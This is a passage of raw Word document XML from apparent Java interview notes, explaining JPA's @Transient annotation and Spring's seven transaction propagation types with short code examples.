    <w:p w14:paraId="0811C1E3" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A08" w:rsidP="00D774B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2035"/>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age</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You might use @Transient when you have a calculated field, a non-persistent object, or any other field that should not be persisted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C47CE80" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A08"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C9BE58" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A0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javax.persistence.Entity;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B981880" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A0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javax.persistence.Id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F0BAE0" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A0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javax.persistence.Transient;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223DC4B8" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A08" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36B09A2A" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A0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Entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30171680" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A0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Employee {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C6ECCB" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A08" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A76D560" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A0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Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE4B577" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A0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Long id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4012899F" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A0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2236681D" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A0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String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C44E1BA" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A0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String department;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19945119" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A08" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69F7EC38" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A0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Transient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672E0CC3" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A0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int calculatedSalary; // This will not be saved in the database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAC8EAC" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A08" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32EA43A9" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A0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int getCalculatedSalary() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603288E1" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A0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this.calculatedSalary;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB9FB74" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A0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32F05135" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A08" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48681D58" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A0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other getters and setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3A908F" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A0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2AC8A4C1" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A0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n the above example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E653BAE" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A08" w:rsidP="00D774B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2036"/>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The calculatedSalary field will </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> be persisted to the database because it is marked with @Transient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAF6B90" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A08" w:rsidP="00D774B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2036"/>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t can be used for temporary calculations or holding intermediate data that does not need to be stored in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BE35C6" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A08"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When to Use @Transient:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C21CB31" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A08" w:rsidP="00D774B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2037"/>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When you have </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-persistent</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> fields in your entity class (e.g., calculated fields or transient data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077CDD9D" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A08" w:rsidP="00D774B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2037"/>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When you want to ensure that certain fields are </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>excluded</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from persistence (to avoid writing unnecessary data to the database).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8F822F" w14:textId="090B93C0"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8448E15">
          <v:rect id="_x0000_i2513" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ED5E16" w14:textId="28983779" w:rsidR="00071C81" w:rsidRPr="00CE4B95" w:rsidRDefault="003D3E93">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="577" w:name="_Toc196308057"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">What are the types of </w:t>
      </w:r>
      <w:r w:rsidR="009E36C2" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">transaction </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>propagation?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="577"/>
    </w:p>
    <w:p w14:paraId="491DDFDC" w14:textId="69EE1D7C" w:rsidR="00910AE4" w:rsidRPr="00D774B4" w:rsidRDefault="00910AE4"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In Spring, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>transaction propagation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> defines how transactions should behave when one transactional method calls another transactional method. It determines whether a new transaction should be created, if the existing transaction should be used, or if the current method should run without any transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A21E09A"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re are seven types of transaction propagation in Spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B23A15" w14:textId="77777777" w:rsidR="00910AE4" w:rsidRPr="00D774B4" w:rsidRDefault="00910AE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1. REQUIRED (Default):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706AEBB4" w14:textId="77777777" w:rsidR="00910AE4" w:rsidRPr="00D774B4" w:rsidRDefault="00910AE4" w:rsidP="00D774B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2038"/>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f there is an existing transaction, the method will join the existing transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E13B72" w14:textId="77777777" w:rsidR="00910AE4" w:rsidRPr="00D774B4" w:rsidRDefault="00910AE4" w:rsidP="00D774B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2038"/>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f there is no existing transaction, a new transaction will be created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB26359" w14:textId="77777777" w:rsidR="00910AE4" w:rsidRPr="00D774B4" w:rsidRDefault="00910AE4" w:rsidP="00D774B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2038"/>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Most common and default propagation type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359A2C7E"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e Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you want to ensure that a method runs within the scope of a transaction, whether a transaction exists or not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A9AB9F"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ransactional(propagation = Propagation.REQUIRED)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6629E866"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void someMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C571C9"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Method logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AB18F7"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7BE999C3" w14:textId="77777777" w:rsidR="00910AE4" w:rsidRPr="00D774B4" w:rsidRDefault="00910AE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2. REQUIRES_NEW:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBCCC78" w14:textId="77777777" w:rsidR="00910AE4" w:rsidRPr="00D774B4" w:rsidRDefault="00910AE4" w:rsidP="00D774B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2039"/>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is will always create a new transaction, regardless of whether there is an existing transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FCF089" w14:textId="77777777" w:rsidR="00910AE4" w:rsidRPr="00D774B4" w:rsidRDefault="00910AE4" w:rsidP="00D774B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2039"/>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f there is an existing transaction, it will be suspended temporarily until the new transaction is completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A4828D" w14:textId="77777777" w:rsidR="00910AE4" w:rsidRPr="00D774B4" w:rsidRDefault="00910AE4" w:rsidP="00D774B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2039"/>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lastRenderedPageBreak/>
        <w:t>Useful for cases where you want a method to run in a completely new transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40311957"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e Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When a method should run in its own transaction, independent of the caller’s transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A5E856"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ransactional(propagation = Propagation.REQUIRES_NEW)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CEFAE5"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void someMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407BD9E4"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Method logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A62CA3B"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6AF5216F" w14:textId="77777777" w:rsidR="00910AE4" w:rsidRPr="00D774B4" w:rsidRDefault="00910AE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3. NESTED:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59107DA8" w14:textId="77777777" w:rsidR="00910AE4" w:rsidRPr="00D774B4" w:rsidRDefault="00910AE4" w:rsidP="00D774B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2040"/>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f there is an existing transaction, it will create a nested transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B18A3E" w14:textId="77777777" w:rsidR="00910AE4" w:rsidRPr="00D774B4" w:rsidRDefault="00910AE4" w:rsidP="00D774B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2040"/>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is nested transaction will be able to commit or roll back independently of the outer transaction. However, if the outer transaction is rolled back, the nested transaction will also be rolled back.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E116228" w14:textId="77777777" w:rsidR="00910AE4" w:rsidRPr="00D774B4" w:rsidRDefault="00910AE4" w:rsidP="00D774B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2040"/>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eful when you want a method to behave like a sub-transaction inside a parent transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEF9F79"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e Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you want to run a method inside a nested transaction, ensuring that it can commit independently but still be rolled back if the parent fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C5EA68"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ransactional(propagation = Propagation.NESTED)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBE5E96"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void someMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3F9348"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Method logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1102157D"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17FF1835" w14:textId="77777777" w:rsidR="00910AE4" w:rsidRPr="00D774B4" w:rsidRDefault="00910AE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4. SUPPORTS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30505AC8" w14:textId="77777777" w:rsidR="00910AE4" w:rsidRPr="00D774B4" w:rsidRDefault="00910AE4" w:rsidP="00D774B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2041"/>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f there is an existing transaction, the method will run within that transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B786F9" w14:textId="77777777" w:rsidR="00910AE4" w:rsidRPr="00D774B4" w:rsidRDefault="00910AE4" w:rsidP="00D774B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2041"/>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f there is no existing transaction, the method will run without any transaction (non-transactional).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC1A98B" w14:textId="77777777" w:rsidR="00910AE4" w:rsidRPr="00D774B4" w:rsidRDefault="00910AE4" w:rsidP="00D774B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2041"/>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eful when a method can work with or without a transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C91FDFA"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e Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When the method can either run within a transaction or outside a transaction, depending on whether one exists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C960C6"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ransactional(propagation = Propagation.SUPPORTS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439256A2"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void someMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6012625C"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Method logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5457A3"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0AB2D77E" w14:textId="77777777" w:rsidR="00910AE4" w:rsidRPr="00D774B4" w:rsidRDefault="00910AE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5. NOT_SUPPORTED:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A01B6FF" w14:textId="77777777" w:rsidR="00910AE4" w:rsidRPr="00D774B4" w:rsidRDefault="00910AE4" w:rsidP="00D774B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2042"/>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f there is an existing transaction, it will be suspended for the duration of the method call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED60D47" w14:textId="77777777" w:rsidR="00910AE4" w:rsidRPr="00D774B4" w:rsidRDefault="00910AE4" w:rsidP="00D774B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2042"/>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f there is no existing transaction, the method will run non-transactionally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C86948" w14:textId="77777777" w:rsidR="00910AE4" w:rsidRPr="00D774B4" w:rsidRDefault="00910AE4" w:rsidP="00D774B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2042"/>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eful when you want to ensure the method runs without any transaction, even if there is an existing one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477BDF2D"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e Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you need to perform an operation outside of a transaction context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762D8A1A"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ransactional(propagation = Propagation.NOT_SUPPORTED)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C17EF98"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void someMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4F86A4"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Method logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EED150B"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684D5489" w14:textId="77777777" w:rsidR="00910AE4" w:rsidRPr="00D774B4" w:rsidRDefault="00910AE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6. NEVER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B0EA40" w14:textId="77777777" w:rsidR="00910AE4" w:rsidRPr="00D774B4" w:rsidRDefault="00910AE4" w:rsidP="00D774B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="204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 method should never run within a transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13179B54" w14:textId="77777777" w:rsidR="00910AE4" w:rsidRPr="00D774B4" w:rsidRDefault="00910AE4" w:rsidP="00D774B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="204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f there is an existing transaction, an exception will be thrown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAEA595" w14:textId="77777777" w:rsidR="00910AE4" w:rsidRPr="00D774B4" w:rsidRDefault="00910AE4" w:rsidP="00D774B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="204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eful when a method should not be invoked within a transactional context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46130438"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e Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you need to enforce that a method should not be executed within a transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6295AFEF"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ransactional(propagation = Propagation.NEVER)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238B4AA1"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void someMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BABE0F"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Method logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641A086F"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55C272FF" w14:textId="77777777" w:rsidR="00910AE4" w:rsidRPr="00D774B4" w:rsidRDefault="00910AE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7. MANDATORY:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC29753" w14:textId="77777777" w:rsidR="00910AE4" w:rsidRPr="00D774B4" w:rsidRDefault="00910AE4" w:rsidP="00D774B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2044"/>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f there is an existing transaction, the method will run within that transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07341A35" w14:textId="77777777" w:rsidR="00910AE4" w:rsidRPr="00D774B4" w:rsidRDefault="00910AE4" w:rsidP="00D774B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2044"/>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f there is no existing transaction, an exception will be thrown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DE0891" w14:textId="77777777" w:rsidR="00910AE4" w:rsidRPr="00D774B4" w:rsidRDefault="00910AE4" w:rsidP="00D774B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2044"/>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eful when the method requires a transaction to be already in place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FB8E0D"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e Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you want to enforce that a method must be executed within an existing transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41854770"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ransactional(propagation = Propagation.MANDATORY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31126ECD"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void someMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B318385"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Method logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258F3F03"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03712AB0" w14:textId="77777777" w:rsidR="00910AE4" w:rsidRPr="00D774B4" w:rsidRDefault="00910AE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Summary of Transaction Propagation Typ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30"/>
        <w:gridCol w:w="6633"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="17212D0F" w14:textId="77777777" w:rsidTr="00910AE4">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="277F5830" w14:textId="77777777" w:rsidR="00910AE4" w:rsidRPr="00D774B4" w:rsidRDefault="00910AE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lastRenderedPageBreak/>
              <w:t>Propagation Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B66F065" w14:textId="77777777" w:rsidR="00910AE4" w:rsidRPr="00D774B4" w:rsidRDefault="00910AE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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="5FCB8BAD" w14:textId="77777777" w:rsidTr="00910AE4">
